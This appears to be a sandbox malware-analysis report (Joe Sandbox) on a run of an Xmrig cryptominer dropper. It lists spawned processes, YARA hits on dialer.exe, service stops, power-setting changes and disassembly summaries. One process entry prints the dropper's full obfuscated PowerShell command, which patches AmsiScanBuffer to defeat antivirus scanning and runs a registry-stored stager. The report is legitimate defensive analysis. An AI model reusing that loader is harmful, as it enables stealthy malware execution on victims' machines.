                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:53
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:54
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:55
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:56
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:57
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:58
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:59
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:60
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                        Imagebase:0x7ff7403e0000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:61
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:62
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:63
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:64
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\lsass.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\lsass.exe
                                                        Imagebase:0x7ff7ac940000
                                                        File size:59'456 bytes
                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:65
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:66
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.3447887034.0000028A981B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                        Has exited:false

                                                        Target ID:67
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''
+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$JRxrSkXtFvoHQj=$opuJgspdjbNOB.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BKEqIqCwRefEvWHkEvb=tvJmJWkkljdL @([String])([IntPtr]);$jHKuyMaewNXWYnPAXNtVwb=tvJmJWkkljdL 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TPsVJhpipYG=$opuJgspdjbNOB.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$rnQeYQPaljIZIy=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+'r'+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$baDhPfYjDHPSnZPKw=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'ua'+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$dImCJWh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rnQeYQPaljIZIy,$BKEqIqCwRefEvWHkEvb).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$VaoZSrEKYRrKpAGDt=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$dImCJWh,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$HGMKYUxWWR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,4,[ref]$HGMKYUxWWR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VaoZSrEKYRrKpAGDt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,0x20,[ref]$HGMKYUxWWR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:68
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:69
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:70
                                                        Start time:22:56:07
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dwm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"dwm.exe"
                                                        Imagebase:0x7ff68eb30000
                                                        File size:94'720 bytes
                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:71
                                                        Start time:22:56:08
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
                                                        Imagebase:0x7ff642ec0000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:72
                                                        Start time:22:56:08
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:73
                                                        Start time:22:56:09
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2171946762.00007FF687BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF687BC0000, based on PE: true
                                                          • Associated: 00000000.00000002.2171881255.00007FF687BC0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2172049332.00007FF687BD8000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2172085483.00007FF687BDE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2172125619.00007FF687BDF000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2172650705.00007FF6880D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2172701763.00007FF68810C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2172725883.00007FF68810F000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff687bc0000_egFMhHSlmf.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction ID: ace1dd9a2667cf07f4c2692a4ac592cd2a1418d9b14aa7b4ecec41d28160f5c5
                                                          • Opcode Fuzzy Hash: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction Fuzzy Hash: 3BB012B0D4430DC8E3012F01D88135836A1BF4A742F408034C40C57352CEBDD040CB10

                                                          Execution Graph

                                                          Execution Coverage:75.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:38.5%
                                                          Total number of Nodes:96
                                                          Total number of Limit Nodes:1

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                          • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                          • API String ID: 3510167801-2888743547
                                                          • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                          • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                          • String ID: dialersvc64
                                                          • API String ID: 2407135876-3881820561
                                                          • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                          • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340

                                                          Control-flow Graph

                                                          APIs
                                                          • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                          • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                          • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                          • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                            • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                            • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                            • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                            • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                            • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                            • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                            • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                            • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                            • Part of subcall function 000000014000117C: CoInitializeEx.OLE32 ref: 0000000140001200
                                                            • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                            • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                            • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                            • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                            • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                            • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                          • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                          • API String ID: 2204944113-1859800454
                                                          • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                          • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID: Microsoft Base Cryptographic Provider v1.0
                                                          • API String ID: 1815803762-291530887
                                                          • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                          • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
